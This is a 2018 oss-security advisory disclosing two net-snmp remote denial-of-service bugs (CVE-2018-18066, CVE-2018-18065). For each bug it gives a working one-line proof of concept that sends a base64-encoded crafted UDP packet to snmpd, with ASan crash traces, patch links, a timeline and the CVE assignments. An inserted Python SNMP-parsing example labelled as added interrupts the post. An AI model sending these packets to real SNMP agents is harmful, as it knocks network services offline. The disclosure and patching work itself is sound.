Message-Id: <EC9F9CC1-4943-4CD5-8463-F40DF6BCA886@stubman.eu>
Date: Mon, 8 Oct 2018 20:46:29 +0200
From: Magnus Klaaborg Stubman <magnus@...bman.eu>
To: oss-security@...ts.openwall.com
Subject: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available)

Reference: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos

2018-10-08

NET-SNMP REMOTE DOS
===================

Back in January I did some vulnerability research of net-snmp 5.7.3 and found some bugs.
Here they are:

VULN#1 CVE-2018-18066
=====================

The first bug is remotely exploitable without knowledge of the community string and leads to Denial of Service:

  # echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0)
      #0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13
      #1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247
      #2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336
      #3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241
      #4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare
  ==41810==ABORTING


Same configuration for both bugs:

  magnus@...b0x:~/projects/net-snmp$ cat snmpd.conf
  rocommunity public  default    -V systemonly
  rocommunity public  localhost    -V systemonly
  rouser   authOnlyUser
  syslocation  "On the Desk"
  syscontact  Me <me@...mple.org>

VULN#2 CVE-2018-18065
=====================

The second bug is remotely exploitable only with knowledge of the community string (in this case "public") and leads to Denial of Service:

  # echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)
      #0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9
      #1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614
      #2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749
      #3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12
      #5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9
      #6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14
      #8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22
      #9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18
      #10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14
      #11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10
      #12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7
      #13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key
  ==41062==ABORTING
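The practical difference between the two bugs is what the sender has to know: vuln#1 is reached by an SNMPv3 message before any authentication, vuln#2 needs a valid v1/v2c community. As an added example (not code from the advisory or from net-snmp), the following minimal BER walker classifies a raw SNMP UDP payload by version and reports either the community string (v1/v2c) or the v3 msgFlags, which is the first question to ask when triaging captured traffic against an snmpd of an affected version. The two sample messages are constructed for this example, not the advisory's PoC payloads.

```python
"""Classify the outer envelope of a raw SNMP message (added example)."""


def _tlv(buf, off):
    """Return (tag, value, next_offset) for the BER element at buf[off]."""
    if off + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag, length = buf[off], buf[off + 1]
    off += 2
    if length & 0x80:                      # long form: low bits = count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    end = off + length
    if end > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[off:end], end


def classify_snmp(msg):
    """Return a dict with the SNMP version and the credential material it carries."""
    tag, body, _ = _tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message (outer SEQUENCE missing)")
    tag, ver, off = _tlv(body, 0)
    if tag != 0x02:
        raise ValueError("version INTEGER missing")
    version = int.from_bytes(ver, "big")
    if version in (0, 1):                  # SNMPv1 / SNMPv2c: community OCTET STRING follows
        tag, comm, _ = _tlv(body, off)
        if tag != 0x04:
            raise ValueError("community OCTET STRING missing")
        return {"version": "v1" if version == 0 else "v2c",
                "community": comm.decode("latin-1")}
    if version == 3:                       # SNMPv3: msgGlobalData = msgID, msgMaxSize, msgFlags, model
        tag, gdata, _ = _tlv(body, off)
        if tag != 0x30:
            raise ValueError("msgGlobalData SEQUENCE missing")
        _, _, o = _tlv(gdata, 0)           # msgID
        _, _, o = _tlv(gdata, o)           # msgMaxSize
        _, flags, _ = _tlv(gdata, o)       # msgFlags: bit0 auth, bit1 priv, bit2 reportable
        f = flags[0] if flags else 0
        return {"version": "v3", "community": None, "auth": bool(f & 1),
                "priv": bool(f & 2), "reportable": bool(f & 4)}
    raise ValueError("unknown SNMP version %d" % version)


# Constructed samples: a v2c GetRequest for sysDescr.0 with community "public",
# and a v3 noAuthNoPriv message whose msgFlags only set the reportable bit.
V2C_GET = bytes.fromhex("3029020101040670"  "75626c6963a01c02040000000102010002010030"
                        "0e300c06082b060102010101000500")
V3_NOAUTH = bytes.fromhex("30370201033" "00d020101020205dc040104020103041030"
                          "0e040002010002010004000400040030110400" "0400a00b020101020100020100" "3000")
```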


PATCHES
=======

Update to net-snmp-5.8 or apply the following patches:

Vuln#1: sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791
Vuln#2: sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d

AFFECTED
========

- 5.7.3
- 5.5.2.1
- 5.6.2.1

More versions may be affected as well.

TIMELINE
========

2015-04-11 Vendor commits fix for bug#1 to version control; no public advisory or other disclosure
2016-10-06 Vendor commits fix for bug#2 to version control; no public advisory or other disclosure
2018-01-05 I discovered both bugs
2018-01-08 Vendor notified
2018-01-08 Vendor responds - bugs already fixed in version control repo
2018-10-08 Public disclosure of exploit
2018-10-08 CVE-ID assignment


PROOF OF DISCOVERY
==================

  # cat vuln1 | base64
  MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBw
  bwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBACh
  WQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEH
  CobetzgECzE3Mi4zMS4xOS4y
  # sha256sum vuln1
  b2ff63c97c705c25c0043758cbd7b1e00cb5692ba1223712a17461082a047125  vuln1
  twitter.com/magnusstubman/status/949520650762358789

  # cat vuln2 | base64
  MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu
  MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN
  MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y
  # sha256sum vuln2
  b7f0e494b8a91c6fedb7e13b3b8dab68a951b5fdc21dd876ae91eb86924018f2  vuln2
  twitter.com/magnusstubman/status/949520565064404994


REFERENCES
==========

- sourceforge.net/p/net-snmp/bugs/2820
- sourceforge.net/p/net-snmp/bugs/2819


CVE ASSIGNMENTS
===============


> [Suggested description]
> _set_key in agent/helpers/table_container.c in
> Net-SNMP before 5.8
> has a NULL Pointer Exception bug that can be used by an
> authenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> resulting in Denial of Service.
>
> ------------------------------------------
>
> [Additional Information]
> A proof of concept exploit is publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Denial of Service (Null Pointer Exception)
>
> ------------------------------------------
>
> [Vendor of Product]
> net-snmp
>
> ------------------------------------------
>
> [Affected Product Code Base]
> net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
>
> ------------------------------------------
>
> [Affected Component]
> snmpd
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> A crafted UDP packet must be sent to the target.
>
> ------------------------------------------
>
> [Reference]
> dumpco.re/blog/net-snmp-5.7.3-remote-dos
> sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true

Use CVE-2018-18065.


> [Suggested description]
> snmp_oid_compare in snmplib/snmp_api.c in
> Net-SNMP before 5.8
> has a NULL Pointer Exception bug that can be used by an
> unauthenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> resulting in Denial of Service.
>
> ------------------------------------------
>
> [Additional Information]
> A proof of concept exploit is publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Denial of Service (NULL Pointer Exception)
>
> ------------------------------------------
>
> [Vendor of Product]
> net-snmp
>
> ------------------------------------------
>
> [Affected Product Code Base]
> net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
>
> ------------------------------------------
>
> [Affected Component]
> snmpd
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> A crafted UDP packet must be sent to the target.
>
> ------------------------------------------
>
> [Reference]
> dumpco.re/blog/net-snmp-5.7.3-remote-dos
> sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791
> sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true

Use CVE-2018-18066.


--
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  cve.mitre.org/cve/request_id.html ]
